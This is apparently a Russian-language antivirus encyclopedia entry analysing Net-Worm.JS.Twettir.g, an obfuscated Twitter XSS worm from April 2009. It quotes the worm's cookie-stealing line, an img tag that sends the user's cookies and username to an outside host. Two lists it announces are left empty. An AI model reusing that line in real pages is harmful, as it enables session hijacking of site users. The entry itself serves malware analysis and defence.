Net-Worm.JS.Twettir.g

Технические детали

Семейство XSS-червей, распространявшихся в социальной сети Twitter в апреле 2009 года. Для своего размножения использовали XSS-уязвимости и были созданы 17-и летним американцем Michael "Mikeyy" Mooney.

Червь использовал уязвимости в программном обеспечении Twitter, позволявшие производить атаки типа «межсайтовый скриптинг» (XSS) и модифицировать страницы учётных записей пользователей. Заражение происходило при посещении модифицированной страницы на сайте Twitter, или при переходе по гиперссылке в поддельном сообщении, присланном от имени участника Twitter. При этом исполнялся вредоносный сценарий JavaScript.

Основной функционал червей содержится в трех функциях:

• XHConn – использует стандартную функцию XMLHttpRequest() для ajax-вызовов;
• Urlencode – использует стандартную функцию encodeURIComponent() для кодировки URI;
• Wait – содержит вредоносный функционал.

Net-Worm.JS.Twettir.g — обфусцированный вариант.
Инициируется выполнение скрипта j.php в теге img, которому передаются параметры cookies и username текущего пользователя:

document.write("<img src=' http://content.ireel.com/j.php?c=" + cookie + "&username=" + username + "'>");

От имени текущего пользователя посылается сообщение посредством POST-запроса пользователю с id = 30685046, содержащее строку “You got me. :)” и содержимое cookies-файла.

Данный вариант червя изменяет следующие параметры пользователя, что приводит к добавлению одной из ссылок на зловредные скрипты : user[url], user[profile_link_color], user[&user[url]. Добавляется один из следующих скриптов:

Также червь изменяет параметры пользователя на следующие:

в результате чего у зараженного пользователя меняется имя аккаунта и фон его страницы.